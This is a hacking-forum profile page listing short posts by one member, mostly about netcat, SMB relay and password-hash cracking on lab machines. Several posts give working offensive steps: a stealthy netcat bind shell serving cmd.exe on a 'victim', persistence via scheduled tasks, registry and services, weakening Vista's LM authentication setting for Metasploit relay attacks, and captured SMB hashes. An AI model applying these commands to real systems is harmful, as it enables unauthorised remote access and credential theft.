Bigmac

Members
  • Content count

    83
  • Joined

  • Last visited

Community Reputation

0 Neutral

About Bigmac

  • Rank
    Gibson Hacker
  1. this is just what i was looking for ... if i was to move these source files back and fourth from different servers and locations i would only need to change the base address
  2. #page source VARlocation = "c:/html/sc/site/" <TITLE>My Home Page</TITLE> <img src= VARlocation & "/pictures/abc.jpg"> <a href= VARlocation & "/someother/location.html"> <body> stuff here </body> If you look at that improper syntax maybe you will see what im trying to do... im going to script a small website, at the top of each source file i would like to be able to change a varible to a new source location... any tips???
  3. my bad spelling is a big problem... im a spell check retard...
  4. a hacker will use the AT command to skedule task, this is one way of keeping your trojin, shell or backdoor always running on the client... a hacker will use the registry to keep a trojin, shell or backdoor starting up when windows first boots up... a hacker will also use the SC command to start a trojin up as a service... here is a small set of instructions for you, that is if you dont know how to use netcat as remote controle... you need 2 computers for this... both computers need netcat located some were on the hard drive(at leas the victim does)... for this test, place netcat on computer 1 in this directory c:/hacked/nc.exe this will be your victim on the victim computer open a command promp and execute these 3 commands ipconfig cd/hacked/ nc -l -p 666 -e cmd.exe -d this will start netcat in a stealthy way, if you check the taskmanager you will see netcat is running... now, from the attacking computer you need to execute this command, take note of the ip address of the victims ipconfig telnet 192.168.1.5 666 netcat is your remote control (shell, backdoor) you need to understand why you would need to use one of the tools above to keep netcat running...
  5. knowing how to do your own research will pay off in the end... search online for any and every bit of documentation on the subject of netcat... i think that once you master this tool to its full extent it will be like wetting your pickle for the first time... at command is what you use with windows to schedule task...
  6. i was trying to add some spice to the mix... most people ask what that is and how they can do that to there computers...
  7. This was just for fun... its not really a tutorial but more of a demonstration... i think i did a good job with this video... the music is epic Lol... cracked wep... filter traffic with ettercap and force smb authentication... smb relay exploit... upload tools for a secure back door... enjoy and let me know what you think... im going to talk to Adrian Crenshaw's and see if he would like this video on his site... direct link http://vimeo.com/5154318
  8. its just another basic exploit... I reset compiz config and tested each plugin with recordmydesktop... changing the settings with each plug helps... when my video card over heats and i start recording the screen flickers... I was going to upload vlcplayer to the exploited box and start evasdropping all media devises on a live stream but i could not get backtrack to connect to this data stream... vls player keep giving me errors on backtrack ,-(
  9. i was board so i did a screen capture today... this video is fresh from recordmydesktop and encoded with ffmpeg... im going to add music from the movie 'hackers' and ill add some subtittles and zooming... Just a preview... http://vimeo.com/5041659 Its not really a tutorial, im hoping i can add some spunk and puzzaz to the video... maybe i can impress some friends most people wont even know whats going on... here is the song i plan on adding to the video...
  10. thanks for the tables... i have installed ophcrack and unzipped some tables... here is a pwdump hash that i cracked with know problem. 6:1014:0b9c5cab5e9c5de1aad3b435b51404ee:a00aa4b31f99caa9260484fefbaceadb::: Now, the problem. the hash i got from metasploit capture/server/smb looks like this 1:1234:24a18757a032db8aee49b4b8d2883ae0b798afe64f2f87e9:24a18757a032db8aee49b4b8d2883ae0b798afe64f2f87e9::: i can trim the hash to the proper size but it wont get cracked... can i use these tables with rainbowcrack? there not in the right format so im sure they wont work but it dont hurt to ask or??? can i use opcrack to crack a spacific string like--> ophcrack -d /root/tables/ -H 9283rh9o38rhf9u8hduf9s8hiv
  11. Ok, so i made a change to the registry in windows vista... now the coprrect lanman hash will be sent out on the network and exploiting and cracking is now possible... HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa\LMCompatibilityLevel by default windows vista has set this to 3, just open up regedit to that location and change the value to a 1... windows/smb/smb_relay windows/smb/psexec both these exploits will now work with no problem... so, i plan on making a video, i still would like to crack the hash for tutorial purposes, im running backtrack from a usbstick and only have about 2-3 gigs available , i need to generate a sufficient rainbow table to fit on the stick that can crack the hash containing the password ribbit any comments or spoon feeding would be a big help with creating these tables...
  12. Im about to make a video tutorial, later on ill worry about building a huge rainbow table but for now i just need to crack this smb hash during a screen capture... http://carnal0wnage.blogspot.com/2009/04/u...fer-module.html http://www.chekmate.org/wiki/index.php/Tut..._rainbow_tables so, i have captured the smb authentication lmhash... I need to generate a quick table and crack the first 16 bits of the hash... 6 digit alpha password = ribbit rtgen lm alpha 6 6 0 2100 80000 test so, this one table should work right? 6 - 6 letter password? :edit: it looks like this is the wrong hash... but im not sure... [*] Captured 192.168.1.5:60247 riebugs-PC\rie bugs LMHASH:36f06f7cf0d7a4749aef12984c20bf0d974adc005d0aec5f NTHASH:fe124399bfe37b130ce96e0c4b4a16f501010000000000004b9a7e8568e2c901974adc005d0aec5f0000000002000000 0000000000000000 OS: LM: [*] Captured 192.168.1.5:60247 riebugs-PC\rie bugs LMHASH:c4814ba02210583fc55a4b0b8eeb21af135142161dcf85ea NTHASH:791178e26ce7963640f419c7f154b6ee01010000000000006b71968568e2c901135142161dcf85ea0000000002000000 0000000000000000 OS: LM: [*] Captured 192.168.1.5:60249 riebugs-PC\rie bugs LMHASH:ab5f2b3f6722df7dddebb097d0c69af41cd90192c53a4a29 NTHASH:32640ab633762201021d69291a1f3f14010100000000000063bea78e68e2c9011cd90192c53a4a290000000002000000 0000000000000000 OS: LM: http://www.milw0rm.com/cracker/insert.php I found this. but i cant crack the hash, i tried the first 16
  13. Hmmm... knoppix has cinelerra already installed...
  14. shoot.. i dont remember this command but i think it goes like this... netstat -nb -t 10 > log.txt netstat -nb -t 10 | log.txt
  15. windump.exe make a batch script and add it to your startup registry... you would have to figure out how to name each logg with a date year and time, got batch script skills? i forget the windump commands @echo off windump -o logg.txt